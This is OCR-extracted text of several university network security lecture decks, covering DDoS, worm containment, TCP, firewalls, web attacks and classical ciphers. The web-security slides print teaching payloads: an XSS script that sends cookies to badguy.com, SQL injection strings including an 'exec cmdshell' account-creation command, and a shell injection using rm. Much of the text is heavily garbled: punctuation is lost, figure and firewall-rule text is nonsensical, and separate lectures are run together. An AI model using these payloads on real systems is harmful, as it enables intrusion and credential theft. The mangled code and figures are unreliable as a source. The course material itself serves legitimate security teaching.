quotecho requestquot is called 39ping39 Broadcast a ping request For sender s address put target s address All hosts reply to ping flooding the target with responses Hard to trace Hard to prevent Turn off ping Makes legitimate use impossible Limit with network configuration by restricting scope of broadcast messages Sometimes called a quotsmurf attackquot 21209 CISTCOM 551 41 Distributed Denial of Service Coordinate multiple subverted machines to attack Flood a server with bogus requests TCP SYN packet flood gt 600000 packets per second Detection amp Assessment 12800 attacks at 5000 hosts in 3 week period during 2001 lP Spoofing forged source IP address httpwwwcsucsdeduuserssavagepapersUsenixSecO1pdf Feb 6 2007 6 of 13 root servers suffered DDoS attack Oct 21 2002 9 of 13 root servers were swampted Prompted changes in the architecture Prevention Filtering Decentralized file storage 21209 CISTCOM 551 42 CIS 551 TCOM 401 Computer and Network Security Spring 2009 Lecture 5 Announcements First project Due 6 Feb 2009 at 1159 pm httpwwwcisupenneducis551proiect1html Group project 2 or 3 students per group Send email to cis551seasupennedu with your group Plan for Today Worms amp Viruses Continued Start of Network Security 12909 CISTCOM 551 Worm Research Sources quotInside the Slammer Wormquot Moore Paxson Savage Shannon Staniford and Weaver quotHow to Own the Internet in Your Spare Time Staniford Paxson and Weaver quotThe Top Speed of Flash Worms Staniford Moore Paxson and Weaver quotInternet Quarantine Requirements for Containing Self Propagating Code Moore Shannon Voelker and Savage quotAutomated Worm Fingerprinting Singh Estan Varghese and Savage Links on the course web pages 12909 CISTCOM 551 Analysis Random Constant Spread Model IP address space 232 N size of the total vulnerable population St susceptiblenoninfected hosts at time t lt infectiveinfected hosts at timet 3 Contact likelihood st StN proportion of susceptible population it ltN proportion of infected population Note St lt N 12909 CISTCOM 551 Infection rate over time Change in infection rate is expressed as d a W 1 2 of infected hosts rate of contact quotkellhOOd that contacted hosts is susceptible Rewrite to obtain Integrate to get this closed form 3tT dl 39 1 39 e a 3 39t quot0 1 e3tT T integration constant 12909 CISTCOM 551 Exponential growth tapers off Example curve of t Here N 35 x 105 t which is it N 3 affects steepness of slope 5 X10 357 3 257 2 15 14 054 Oo 10o 200 3630 4630 5630 600 t secs 12909 CISTCOM 551 What can be done Reduce the number of infected hosts Treatment reduce t while t is still small eg shut downrepair infected hosts Reduce the contact rate Containment reduce rs while t is still small eg filter traffic Reactive Reduce the number of susceptible hosts Prevention reduce 80 Proactive eg use typesafe languages 12909 CISTCOM 551 7 Treatment Reduce of infected hosts Disinfect infected hosts Detect infection in realtime Develop specialized vaccine in realtime Distribute patch more quickly than worm can spread Antiworm CRCIean Bandwidth interference 12909 CISTCOM 551 Effects f quotatohinquot infeote hsts KermaokMoKendriok Model State transition susceptibl Ut it of removed from infectious population y removal rate x10 di du 1 H I3 H j Nm du a y it 4 I t 2 0 12909 CISTCOM 551 t 9 Containment Reduce contact rate 3 Oblivious defense Consume limited worm resources Throttle traffic to slow spread Possibly important capability but worm still spreads Targeted defense Detect and block worm 12909 CISTCOM 551 10 Design Space Design Issues for Reactive Defense Moore et al 03 Any reactive defense is defined by Reaction time how long to detect propagate information and activate response Containment strategy how malicious behavior is identified and stopped Deployment scenario who participates in the system Savage et aI evaluate the requirements for these parameters to build any effective system for worm propagation 12909 CISTCOM 551 11 Methodology Moore et al quotInternet Quarantinequot paper Simulate spread of worm across Internet topology infected hosts attempt to spread at a fixed rate probessec target selection is uniformly random over IPv4 space Simulation of defense system detects infection within reaction time subset of network nodes employ a containment strategy Evaluation metric of vulnerable hosts infected in 24 hours 100 runs of each set of parameters 95th percentile taken Systems must plan for reasonable situations not the average case Source data vulnerable hosts 359000 IP addresses of CodeRed v2 victims Internet topology AS routing topology derived from RouteViews 12909 CISTCOM 551 12 Initial Approach Universal Deployment Assume every host employs the containment strategy Two containment strategies they tested Address blacklisting block traffic from malicious source IP addresses reaction time is relative to each infected host Content filtering block traffic based on signature of content reaction time is from first infection How quickly does each strategy need to react How sensitive is reaction time to worm probe rate 12909 CISTCOM 551 13 Reaction times Address Blacklisting Content Filtering m i i m a w 3 w a so is W CL CL 5 a a w ii 3 w ill 8 m 7 E g N e E m 2n 3a m m Reaction time minutes i l 1 5 5 Reaction time hours To contain worms to 10 of vulnerable hosts after 24 hours of spreading at 10 probessec CodeRed Address blacklisting reaction time must be lt 25 minutes Content filtering reaction time must be lt 3 hours 12909 CISTCOM 551 14 Probe rate vs Reaction Time may Am 1m 2n min NH 1 min reaction time insec Content Filtering u in 1000 inn n probesfsecond Reaction times must be fast when probe rates get high 10 probessec reaction time must be lt hours 1000 probessec reaction time must be lt 2 minutes 12909 CISTCOM 551 Limited Network Deployment Depending on every host to implement containment is not feasible installation and administration costs system communication overhead A more realistic scenario is limited deployment in the network Customer Network firewalllike inbound filtering of traffic ISP Network traffic through border routers of large transit lSPs How effective are the deployment scenarios How sensitive is reaction time to worm probe rate under limited network deployment 12909 CISTCOM 551 16 Deployment Scenario Effectiveness Reaction time 2 hours CodeRed like Worm 5 mo i A L A r A 8 a e 8039 Customel ISP a so 2 g 40 a B a w I SQ 0 l a I squot w w w cg Content filtering firewalls Content filtering at exchange at edge of customer nets points in major lSPs 12909 CISTCOM 551 17 Reaction Time vs Probe Rate II Top 100 ISPs Filter lchy Hill 8h 4h39lt 139139 main Ionin Inin reaction time 2085C r IDSEC 1 sec l ICU I O probes second Above 60 probessec containment to 10 hosts within 24 hours is impossible even with instantaneous reaction 12909 CISTCOM 551 18 Summary Reactive Defense Reaction time required reaction times are a couple minutes or less far less for bandwidthlimited scanners Containment strategy content filtering is more effective than address blacklisting Deployment scenarios need nearly all customer networks to provide containment need at least top 40 lSPs provide containment 12909 CISTCOM 551 19 Mechanisms to Mitigate Malware Networklevel defenses Firewalls Intrusion Detection Systems Next several lectures networks amp network Content filtering security OSlevel defenses Access controls Authorization Softwarelevel defenses Type safe languages Program verification Software certification 12909 CISTCOM 551 20 Network Architecture General blueprints that guide the design and implementation of networks Goal to deal with the complex requirements of a network Use abstraction to separate concerns Identify the useful service Specify the interface Hide the implementation 12909 CISTCOM 551 21 Layenng A result of abstraction in network design A stack of services layers Hardware service at the bottom layer Higher level services are implemented by using services at lower levels Advantages AppIication Decompose problems Modular changes Error Contro I l l h l 12909 CISTCOM 551 22 Protocols A protocol is a specification of an interface between modules often on different machines Sometimes protocol is used to mean the implementation of the specification 12909 CISTCOM 551 23 Example Protocol Stack Application Programs Requestl Reply Channel Message Stream Channel HosttoHost Connectivity Hardware 12909 CISTCOM 551 Protocol Interfaces Service Interfaces Communicate up and down the stack Peer Interfaces Communicate to counterpart on another host Highlevel Ob ect Service interface 7 Highlevel Ob ect I Service Interface 7 Protocol Host1 V Protocol Peertopeer interface Host2 12909 CISTCOM 551 25 CIS 551 TCOM 401 Computer and Network Security Spring 2010 Lecture 8 Protocol Stack Revisited Application Presentation Session UDP and TCPIP So far 22510 CISTCOM 551 Applications vs Networks Application Requirements Network Characteristics Reliable Ordered SingleCopy Message Delivery Drops Duplicates and Reorders Messages Arbitrarily large messages Finite message size Flow Control by Receiver Arbitrary Delay Supports multiple applications per host 22510 CISTCOM 551 User Datagram Protocol UDP SrcPort DestPort Length Checksum IP Packet Data Minimalist transportlayer protocol Exposes lP packet functionality to application level Ports identify sendingreceiving process Demultiplexing information port host pair identifies a network process 22510 CISTCOM 551 UDP Endto End Model MuItiplexingDemultiplexing with Port number 22510 CISTCOM 551 5 Using Ports Client contacts Server at a wellknown port SMTP port 25 DNS port 53 POP3 port 110 Unix talk port 517 In Unix ports are listed in etcservices Sometimes Client and Server agree on a different port for subsequent communication Ports are an abstraction Implemented differently on different OS s Typically a message queue 22510 CISTCOM 551 Transmission Control Protocol TCP Most widely used protocol for reliable byte streams Reliable inorder delivery of a stream of bytes Full duplex pair of streams one in each direction Flow and congestion control mechanisms Like UDP supports ports Built on top of IP hence TCPIP designation 22510 CISTCOM 551 TCP Endto End Model Buffering trades delays for losseserrors p 22510 CISTCOM 551 Packet Format Flags Fields SYN FIN o 15 31 RESET PUSH URG SequenceNum ACK SrcPort DStPOl t Acknowledgment H O AdvertV nd Checksum UrgPtr Options variable 22510 CISTCOM 551 ThreeWay Handshake Active participant Passive participant client server 5 V N SeQUenCeNUm ACK A CknOWe dgment 3 1 22510 ClSTCOM 551 10 TCP State Transitions CLOSED Attive openSYN Pemive open Close LISTEN SYNSYN ACK SemiSYN SYNSYN ACK SYNRCVD SYNSENT ACK SYN ACKACK CloseFIN ESTABLISHED CloseFIN FINACK FINWAIT1 CLOSE WAIT FINACK 39 Clase FIN FINWAITZ CLOSING LASTACK ACK Timeout after two AC K FINACK segment lzfetimes TIMEWAIT CLOSED 22510 CISTCOM 551 11 TCP Receiver Maintains a buffer from which application reads Advertises lt buffer size as the window for sliding window Responds with Acknowledge and AdvertisedWindow on each send updates byte counts when data OK Application blocked until read OK 22510 CISTCOM 551 12 TCP Sender Maintains a buffer sending application is blocked until room in the buffer for its write Holds data until acknowledged by receiver as successfully received Implement window expansion and contraction note difference between flow and congestion control 22510 CISTCOM 551 13 TCP Flow amp Congestion Control Flow vs Congestion Control Flow control protects the recipient from being ovenvhelmed Congestion control protects the network from being ovenvhelmed TCP Congestion Control Additive Increase Multiplicative Decrease Slow Start Fast Retransmit and Fast Recovery 22510 ClSTCOM 551 14 Increase and Decrease A value CongestionWindow is used to control the number of unacknowledged transmissions This value is increased linearly until timeouts for ACKs are missed When timeouts occur CongestionWindow is decreased by half to reduce the pressure on the network quickly The strategy is called additive increase multiplicative decrease 22510 CISTCOM 551 15 Additive Increase z 22510 CISTCOM 551 TCP Sawtooth Pattern KB W Time 22510 CISTCOM 551 17 Slow Start Sending the entire window immediately could cause a trafficjam in the network Begin slowly by setting the congestion window to one packet When acknowledgements arrive double the congestion window Continue until ACKs do not arrive or flow control dominates 22510 CISTCOM 551 18 Slow Start A 9 quot30 We 9 w W 22510 CISTCOM 551 Network Vulnerabilities Anonymity Attacker is remote origin can be disguised Authentication Many points of attack Attacker only needs to find weakest link Attacker can mount attacks from many machines Shanng Many many users sharing resources Complexity Distributed systems are large and heterogeneous Unknown perimeter Unknown attack paths 22510 ClSTCOM 551 20 Syn Flood Attack Recall TCP s 3way handshake SYN SYNACK ACK Receiver must maintain a queue of partially open TCP connections Called SYNRECV connections Finite resource often small eg 20 entries Timeouts for queue entries are about 1 minute Attacker Floods a machine with SYN requests Never ACKs them Spoofs the sending address 22510 CISTCOM 551 21 Distributed Denial of Service Coordinate multiple subverted machines to attack Flood a server with bogus requests TCP SYN packet flood gt 600000 packets per second Detection amp Assessment 12800 attacks at 5000 hosts in 3 week period during 2001 IP Spoofing forged source IP address httpwwwcsucsdeduuserssavagepapersUsenixSecO1pdf Feb 6 2007 6 of 13 root servers suffered DDoS attack Oct 21 2002 9 of 13 root servers were swamped Prompted changes in the architecture Prevention Filtering Decentralized file storage 22510 CISTCOM 551 22 Kinds of Firewalls Personal firewalls Run at the end hosts eg Norton Windows etc Benefit has more applicationuser specific information Filter Based Operates by filtering based on packet headers Proxy based Operates at the level of the application eg HTTP web proxy 22510 ClSTCOM 551 23 Filtering Firewalls Filtering can take advantage of the following information from network and transport layer headers Source Destination Source Port Destination Port Flags eg ACK Protocol type eg UDP vs TCP Some firewalls keep state about open TCP connections Allows conditional filtering rules of the form if internal machine has established the TCP connection permit inbound reply packets 22510 ClSTCOM 551 25 Lapiservxce quot4 22 113 w impitypes ccnurnqquot cmn93 19216501 w optiuns 50L snack psnsy return 5m lugintcxfacu Sextixi scL skip an 0 1y scrub match 1n an scrub mDAdIJ t naerd nac an smug mm uscxgm gt 6chth natanchnz EtpproXy quot zdrauchoz ELp proXy 1dr pass an sans pinto top Lu port m gt 1270u1 pur an zdr an Sextixf prom cap from any to any pan rm gt Scampi LUch Haas block 1n pass out keep state anchuz itshpruxyl39 anuspas quack m lt 10 smst pass in on scxtili nct quto LCD from any to Hangs pun seepisaxvasss flags sSA kaap state pass in on smile nc i mm tap 5m any to Scampi yum rm Jags ssa synpme sLace pass in net pruto Acmp an amp mas icmp7typcs kcny state Pass in quick as sue Example pf rules from openbsdorg website Filter Example Action ourhost port theirhost port comment block BAD untrusted host allow GW 25 allow our SMTP port Apply rules from top to bottom with assumed default entry Action ourhost port theirhost port comment block default Bad entry intended to allow connections to SMTP from inside Action ourhost port theirhost port comment allow 25 connect to their SMTP This allows all connections from port 25 but an outside machine can run anything on its port 25 22510 ClSTCOM 551 28 Filter Example Continued Permit outgoing calls to port 25 Action src port dest port flags comment allow 123456 25 their SMTP allow 25 ACK their replies This filter doesn t protect against IP address spoofing The bad hosts can pretend to be one of the hosts with addresses 123456 22510 CISTCOM 551 29 When to Filter Firewall 22510 CISTCOM 551 30 On Input or Output Filtering on output can be more efficient since it can be combined with table lookup of the route However some information is lost at the output stage eg the physical input port on which the packet arrived Can be useful information to prevent address spoofing Filtering on input can protect the router itself 22510 CISTCOM 551 31 Principles for Firewall Configuration General principle Filter as early as possible Least Privilege Turn off everything that is unnecessary eg Web Servers should disable SMTP port 25 Failsafe Defaults By default should reject Note that this could cause usability problems Egress Filtering Filter outgoing packets too You know the valid IP addresses for machines internal to the network so drop those that aren t valid This can help prevent DoS attacks in the Internet 22510 CISTCOM 551 32 Example real firewall config script t t t t t FreeBSD Firewall configuration Singlemachine custom firewall setup Protects somewhat against the outside world t t t t t Set this to your ip address ipquot192100661quot setupoopback Allow anything outbound from this address fwcmd add allow all from ip to any out Deny anything outbound from other addresses fwcmd add deny log all from any to any out Allow inbound ftp ssh email tcpdns http https imap imaps pop3 pop3s fwcmd add allow top from any to ip 21 setup fwcmd add allow top from any to ip 22 setup fwcmd add allow top from any to ip 25 setup fwcmd add allow top from any to ip 53 setup fwcmd add allow top from any to ip 80 setup fwcmd add allow top from any to ip 443 setup 22510 CISTCOM 551 33 Proxybased Firewalls Firewall Internal TCPHTTP Proxy acts like both a client and a server Able to filter using applicationlevel info For example permit some URLs to be visible outside and prevent others from being visible Proxies can provide other services too Caching load balancing etc FTP and Telnet proxies are common too connection Local Web Server 22510 CISTCOM 551 34 CIS 551 TCOM 401 Computer and Network Security Spring 2009 Lecture 24 Announcements Plan for Today Web Security Part Project 4 is due 28 April 2009 at 1159 pm Final exam has been scheduled Friday May 8 2009 900am 1100am Moore 216 Please complete online course evaluations httpwwwupennedueval 42309 CISTCOM 551 Web Security Review HTTP scripting Risks from incoming executable code JavaScnpt ActiveX Plugins Java Next time Controlling outgoing information Cookies Cookie mechanism 42309 CISTCOM 551 HyperText Transfer Protocol Used to request and return data Methods GET POST PUT HEAD DELETE Stateless requestresponse protocol Each request is independent of previous requests Statelessness has a significant impact on design and implementation of applications Evolution HTTP 10 simple HTTP 11 more complex added persistent connections 42309 CISTCOM 551 HTTP Request Method File HTTP version Headers GET defaultasp HTTP10 1 Accept imagegif imagexbitmap imagejpeg AcceptLanguage en UserAgent Mozilla122 compatible MSIE 20 Windows 95 Connection Keep Alive IfModified Since Sunday 20 Apr 08 043258 GMT Blank line Data none for GET L 42309 CISTCOM 551 HTTP Response HTTP version Status code Reason phrase 4 HTTP10 200 OK Date Sun 20 Apr 2008 22042 GMT Server Microsoft Internet Information Server50 Connection keep alive ContentType texthtml LastModified Thu 17 Apr 2008 173905 GMT ContentLength 2543 ltHTMLgt Some data blah blah blah ltHTMLgt Headers Data 42309 CISTCOM 551 HTTP Server Status Codes Code Description 0 Return code 401 200 OK Used to indicate HTTP 201 Created authorization HTTP authorization has 301 Moved Permanently serious problems 302 Moved Temporarily 400 Bad Request not understood 401 Unauthorized 403 Forbidden not authorized 404 Not Found 500 Internal Server Error 42309 CISTCOM 551 HTML and Scripting lthtmgt ltPgt ltScriptgt Browser receres content displays var hum num2 sum HTML and executes scripts num1 promptquotEnter first numberquot num2 promptquotEnter second numberquot sum parselntnum1 parselntnum2 alertquotSum quot sum ltscriptgt lthtrn gt 42309 CISTCOM 551 Events ltscript typequottextjavascriptquotgt function whichButtonevent if eventbutton1 alertquotYou clicked the left mouse buttonquot Mouse event causes else pagedefined function alertquotYou clicked the right mouse buttonquot to be called ltscriptgt ltbody onmousedownquotwhichButtoneventquotgt ltbodygt Other events onLoad onMouseMove onKeyPress onUnLoad 42309 CISTCOM 551 9 Document object model DOM Objectoriented interface used to read and write documents web page in HTML is structured data DOM provides representation of this hierarchy Examples Properties documentalinkColor documentURL documentforms documentinks documentanchors Methods documentwritedocumentreferrer Also Browser Object Model BOM Window Document Frames History Location Navigator type and version of browser 42309 CISTCOM 551 10 Browser security risks Compromise host Write to file system Interfere with other processes in browser environment Steal information Read file system Read information associated with other browser processes eg other windows Fool the user Reveal information through traffic analysis 42309 CISTCOM 551 11 OWASPorg Top 10 2007 Open Web Application Security Project 1 Crosssite Scripting X88 2 Injection flaws 3 Malicious file execution 4 Insecure direct object reference 5 Crosssite request forgery 6 Information leakage and improper error handling 7 Broken authentication and session management 8 Insecure cryptographic storage 9 Insecure communications 10 Failure to restrict URL access 42309 CISTCOM 551 12 Browser sandboxing Idea Code executed in browser has only restricted access to 08 network and browser data structures Isolation Similar to OS process isolation conceptually Browser is a weak OS Same Origin Principle Only the site that stores some information in the browser may later read or modify that information or depend on it in any way Details What is a site URL domain pages from same site What is information cookies document object cache Default only users can set other policies No way to keep sites from sharing information 42309 CISTCOM 551 13 Schematic web site architecture Application Firewall WAF Load Balancer IDS amp l l iii ADD Servers Authorization Netegrity CA OinX Oracle 42309 CISTCOM 551 14 Web app code Runs on web server or app server Takes input from web users via web server Interacts with the database and 3rd parties Prepares results for users via web server Examples Shopping carts home banking bill pay tax prep New code written for every web site Written in C PHP Perl Python JSP ASP Often written with little consideration for security 42309 CISTCOM 551 15 Common vulnerabilities OWASP Inadequate validation of user input Cross site scripting SQL Injection HTTP Splitting Broken session management Can lead to session hijacking and data theft Insecure storage Sensitive data stored in the clear Prime target for theft eg egghead Verizon Note PCI Data Security Standard Visa Mastercard 42309 ClSTCOM 551 16 Warm up a simple example Direct use of user input httpvictimcomcopyphp nameusername H4 k J script name script Input copyphp system cp tempdat namedatquot Problem httpvictimcomcopyphp name a rm should be namea2020rm20 42309 CISTCOM 551 17 Redirects EZShoppercom shopping cart httpcgibin loadpagecgi pageurl Redirects browser to url Redirects are common on many sites Used to track when user clicks on external link Some sites uses redirects to add HTTP headers Problem phishing httpvictimcomcgibinloadpage pagephishercom Linkto victimcom puts user at phishercom gt Local redirects should ensure target URL is local 42309 CISTCOM 551 18 CrossSite Scripting The setup User input is echoed into HTML response Example search field httplvictimcomlsearchphp term apple searchphp responds with ltHTMLgt ltBODYgt ltTITLEgt Search Results ltTITLEgt Results for ltphp echo GETterm gt ltBODYgt ltHTMLgt Is this exploitable 42309 ClSTCOM 551 19 Badinput 42309 Problem no validation of input term Consider link http victim com search php term properly URL encoded ltscriptgt windowopen httpbadguycomcookie quot documentcookie ltscriptgt What if user clicks on this link 1 Browser goes to victimcomsearchphp 2 Victimcom returns ltHTMLgt Results for ltscriptgt m 3 Browser executes script Sends badguycom cookie for victimcom cencomsm 2o ltscriptgt So what Why would user click on such a link Phishing email in webmail client eg gmail Link in doubleclick banner ad many many ways to fool user into clicking What if badguycom gets cookie for victimcom Cookie can include session auth for victimcom Or other data intended only for victimcom 2 Violates same origin policy 42309 ClSTCOM 551 21 URls are complicated Uniform Resource Identifier URI aka URL URI is an extensible format URl scheme hier part quotquot query quotquot fragment Examples ftpftpfoocomdirfiletxt httpwwwcisupennedu ldap2001db87cGBobjectClassone tel1215898 2661 httpwwwgooglecomsearch clientsafariamprlsenampqfooampieUTF8ampoeUTF8 42309 CISTCOM 551 22 URI39s continued Confusion Try going to wwwwhitehouseorq or wwwwhitehouseoom instead of wwwwhitehouseqov wwwfoocom wwwfoocom Obfuscation Use IP addresses rather than host names http192345678 Use Unicode escaped characters rather than readable text httpsusie69532684f54net 42309 CISTCOM 551 23 Even worse Attacker can execute arbitrary scripts in browser Can manipulate any DOM component on victimcom Control links on page Control form fields eg password field on this page and linked pages Can infect other users MySpacecom worm 42309 CISTCOM 551 24 MySpacecom Samy worm Users can post HTML on their pages MySpacecom ensures HTML contains no ltscriptgt ltbodygt onclick lta hrefjavascriptgt but can do Javascript within 088 tags ltdiv style backgroundurl javascriptzalert 1 gt And can hide javascript as javanscript With careful javascript hacking Samy s worm infects anyone who visits an infected MySpace page and adds Samy as a friend Samy had millions of friends within 24 hours More info httpnamblapopulartechhtml 42309 CISTCOM 551 25 Avoiding XSS bugs PHP Main problem Input checking is difficult many ways to inject scripts into HTML Preprocess input from user before echoing it PHP htmlspecialcharsstring amp 9 ampamp quot 9ampquot 39 a amp039 lt a ampIt gt9 ampgt htmlspecialchars quotlta href39test39gtTestltagtquot ENTQUOTES Outputs ampIta hrefamp039testamp039ampgtTestampItaampgt 42309 CISTCOM 551 26 Avoiding XSS bugs ASPNET Active Server Pages ASP Microsoft39s serverside script engine ASPNET ServerHtmEncodestring Similar to PHP htmlspecialchars validateRequest on by default Crashes page if finds ltscriptgt in POST data Looks for hardcoded list of patterns Can be disabled lt Page validateRequest falsequot gt 42309 CISTCOM 551 27 SQL Injection The setup User input is used in SQL query Example login page ASP execute SELECT FROM UserTable form user amp amp I set ok WHERE username39 amp 39 AND passwor 39 amp form pwd If not okEOF login success else fail Is this exploitable 42309 CISTCOM 551 28 Of course xkcdcom HI THIS IS YOUR SONS SCHOOL WE39RE HAVING 50m COI lPUTER TROUBLE m OH DEAR DID HE BREAK 50HE39THIAG IN A WAY Tm DID YOU REALLY NAME YOUR SON Robcrf DROIgt TABLE Stamp OH YES LITTLE BOBBY TABUZS WE ALL HIM WELL WEVE LOST THIS YEAR39S STUDENT RECCRDS I HOPE YOU39RE WW I AND I HOPE YOU39VE LEARNED i TO SFNmZE YOUR DATABASE INPUTS 42309 CISTCOM 551 29 Badinput Suppose user 39or 1 1 URL encoded Then scripts does ok execute SELECT WHERE username or 11 The causes rest ofline to be ignored Now okEOF is always false The bad news easy login to many sites this way 42309 CISTCOM 551 30 Even worse Suppose user 39exec cmdshell 39net user badguy badpwd39 ADD Then script does ok execute SELECT m WHERE username exec m If SQL server context runs as sa system administrator attacker gets account on DB server Or as in the XKCD comic user Robert39 DROP TABLE Students 42309 CISTCOM 551 31 Avoiding SQL injection Build SQL queries by properly escaping args 39 a 39 Example Parameterized SQL ASPNET Ensures SQL arguments are properly escaped SqlCommand cmd new SqlCommand quotSELECT FROM UserTable WHERE username User AND password Pwdquot dbConnection cmdParametersAddquotUserquot Request userquot cmdParametersAddquotPwdquot Request pwdquot cmdExecuteReader 42309 CISTCOM 551 32 HTTP Response Splitting The Setup User input echoed in HTTP header Example Language redirect page JSP responseredirect bylangjsplangquot requestgetParameter lang gt Browser sends httpbylangjsp langfrench Server HTTP Response HTTP11 302 redirect Date m Location bylangjsp langfrench Is this exploitable 42309 CISTCOM 551 33 Badinput Suppose browser sends httpbyangjsp Iang french n Content length 0 rnrn HTTP1 1 200 OK Spoofed page URLenamem 42309 CISTCOM 551 34 Badinput HTTP response from server looks like HTTP11 302 Date Location bylangjsp lang french redirect Content length 0 lt HTTP11 200 OK 2 Content length 217 K Spoofed page 42309 CISTCOM 551 35 So what What just happened Attacker submitted bad URL to victimcom URL contained spoofed page in it Got back spoofed page So what Cache servers along path now store spoof of victimcom VWI fool any user using same cache server Defense don t do that 42309 CISTCOM 551 36 CIS 551 TCOM 401 Computer and Network Security Spring 2009 Lecture 12 Announcements Plan for Today Introduction to Cryptography Project 2 reminder Due Friday 1159 pm Project 3 will be up soon 3909 CISTCOM 551 Kpu rroyporcpior Cryptography From the Greek quotkryptosquot and quotgraphiaquot for secret writing Confidentiality Obscure a message from eavesdroppers Integrity Assure recipient that the message was not altered Authentication Verify the identity of the source of a message Nonrepudiation Convince a 3rd party that what was said is accurate 3909 CISTCOM 551 3 Terminology encr tion dec tion Plaintext yp Ciphertext ryp Plaintext Cryptographer Invents cryptosystems Cryptanalyst Breaks cryptosystems Cryptology Study of crypto systems Cipher Mechanical way of encrypting text or data Code Semantic translation eat breakfast tomorrow attack on Thursday or use Navajo Key a parameter of the Cipher algorithm 3909 CISTCOM 551 4 Kinds of Cryptographic Analysis Goal is to recover the key amp algorithm And hence recover the plaintext Ciphertext Only attacks No information about content or algorithm Very hard Algorithm amp Ciphertext attacks Known algorithm known ciphertext recover key Common in practice Known Plaintext attacks Full or partial plaintext available in addition to ciphertext Chosen Plaintext attacks Attacker can choose which plaintext is encrypted tries to reverse engineer the key May be able to choose multiple plaintexts 3909 CISTCOM 551 The Caesar Cipher Purportedly used by Julius Caesar c 75 BC Add 3 mod 26 Advantages Simple Intended to be performed in the field Most people couldn t read anyway Disadvantages Violates no security through obscurity Easy to break why 04 9 CD O39 h O QJ gtlt O39lt 39lt Olt N 3909 CISTCOM 551 Monoalphabetic Ciphers Also called substitution ciphers Separate algorithm from the key Add N mod 26 rot13 Add 13 mod 26 General monoalphabetic cipher Arbitrary permutation n of the alphabet Key is the permutation 3909 CISTCOM 551 Example Cipher abcdefghijkl 7 zdancewibfgh Plaintext he lied Ciphertext ic hbcn 3909 CISTCOM 551 Cryptanalysis of Monoalphabetic Ciphers Brute force attack try every key N Possible keys for Nletter alphabet 26 z 4 x1026 possible keys Try 1 key per usec 10 trillion years but i monoalphabetic Ciphers are easy to solve Onetoone mapping of letters is bad Frequency distributions of common letters 3909 CISTCOM 551 Order amp Frequency of Single Letters B 162 L 403 E 1231 959 D 365 G 161 A 805 C 320 V 093 T 794 U 310 K 052 719 P 229 Q 020 718 F 228 X 020 659 M 225 J 010 R 603 W 203 H 514 O N I S Z 009 Y 188 10 CISTCOM 551 3909 Monoalphabetic Cryptanalysis Count the occurrences of each letter in the cipher text Match against the statistics of English Most frequent letter likely to be e 2nol most frequent likely to be t etc Longer ciphertext makes statistical analysis more likely to work 3909 CISTCOM 551 11 Digrams and Trigrams Diagrams in frequency order for English TH HE AN IN ER RE ES ON EA T AT ST EN ND OR Trigrams in frequency order for English THE AND THA ENT ION TO FOR NDE HAS NCE EDT TIS OFT STH MEN 12 Desired Statistics Problems with monoalphabetic ciphers Frequency of letters in ciphertext reflects frequency of plaintext Want a single plaintext letter to map to multiple ciphertext letters ell gt XH C W Ideally ciphertext frequencies should be flat 3909 CISTCOM 551 13 Vigenere Tableau Multiple substitutions Can choose complimentary ciphers so that the frequency distribution flattens out More generally more substitutions means flatter distribution Vigenere Tableau Invented by Blaise de Vigenere forthe court of Henry III of France c 1500 s Collection of 26 permutations Usually thought of as a 26 x 26 grid Key is a word 14 Vigenere Tableau a b c d e f g A a b c d e f g B b c d e f g h C c d e f g h i D d e f g h 1 j E e f g h i j k Plaintext a bad deed Key bed B EDB EDBE Ciphertext b fde hgfh 15 Polyalphabetic Substitutions Pick k substitution ciphers Encrypt the message by rotating through the k substitutions m e S S a g e 31m 7529 7535 7543 7513 7529 7539 q a x o a u v Same letter can be mapped to multiple different ciphertexts Helps smooth out the frequency distributions Diffusion 3909 CISTCOM 551 16 Cracking Polyalphabetic Substitutions SEp1 Try to identify the number of substitutions used For example guess the length of the word used as a key in the Vigenere tableau SEpZ Use frequency information to crack each of the subsitutions as though it was a monoalphabetic cipher 3909 CISTCOM 551 17 Kasiski Method Identify key length of polyalphabetic ciphers If pattern appears k times and key length is n then it will be encoded kn times by the same key 1 Identify repeated patterns of 2 3 chars 2 For each pattern Compute the differences between starting points of successive instances Determine the factors of those differences 3 Key length is likely to be one of the frequently occurring factors 18 Cryptanalysis Continued Once key length is guessed to be k Split ciphertext into k slices Single letter frequency distribution for each slice should resemble English distribution How do we tell whether a particular distribution is a good match for another Let proboc be the probability for letter or In a perfectly flat distribution proboc 126 00384 19 Variance Measure of roughness Measure distance from flat dist OL Z Var 2 proboc 1262 or a OLZ 2 proboc2 126 oca 3909 CISTCOM 551 20 Estimate Variance From Frequency proboc2 is probability that any two characters drawn from the text will be or Suppose there are n ciphertext letters total Suppose freqoc is the frequency of or What is likelihood of picking or twice at random freqoc ways of picking the first or freqoc 1 ways of picking the second or But this counts twice because oc Bo So fredd x fredoc 1 2 21 Index of Coincidence Butthere are pairs ofletters freqoc x freqd 1 n x n1 so probd is roughly Index of coincidence approximates variance from frequencies 0 Z freqd x freqd 1 39C Z nx n1 13 22 What s it good for If the distribution is flat then IC a 00384 Ifthe distribution is like English then IC as 0068 Can verify key length keylen 1 2 3 4 5 IC 0068 0052 0047 0044 0044 many 0038 23 Summary Cracking Polyalphabetics Use Kasiski method to guess likely key lengths Compute the Index of Coincidence to verify key length k kSlices should have IC similar to English Note digram information harder to use for polyalphabetic ciphers May want to consider split digrams Example if tion is a common sequence k2 then to and in are likely split digrams 24 Perfect Substitution Ciphers D192 93 pn 9 b1 b2 b3 bn c1c2 c3 cn Choose a string of random bits the same length as the plaintext XOR them to obtain the ciphertext Perfect Secrecy Probability that a given message is encoded in the ciphertext is unaltered by knowledge of the ciphertext Proof Give me any plaintext message and any ciphertext and I can construct a key that will produce the ciphertext from the plaintext 3909 CISTCOM 551 25 Onetime Pads Another name for Perfect Substitution Actually used by US agents in Russia Physical pad of paper List of random numbers Pages were torn out and destroyed after use Numbers Stations Vernam Cipher Used by ATampT Random sequence stored on punch tape Not practical for general purpose crypography But useful as component in other protocols 3909 CISTCOM 551 26 Problems with Perfect Substitution Key is the same length as the plaintext Sender and receiver must agree on the same random sequence Not any easier to transmit key securely than to transmit plaintext securely Need to be able to generate many truly random bits Pseudorandom numbers generated by an algorithm aren t good enough for long messages Must be careful Remember the RC4 algorithm from WEP Can t reuse the key Not enough confusion 3909 CISTCOM 551 27 Diffusion and Confusion Diffusion Ciphertext should look random Protection against statistical attacks Monoalphabetic gt Polyalphabetic substitution diffusion increases Confusion Make the relation between the key plaintext and ciphertext complex Lots off confusion gt hard to calculate key in a known plaintext attack Polyalphabetic substitution little confusion 3909 CISTCOM 551 28 Computational Security Perfect Ciphers are 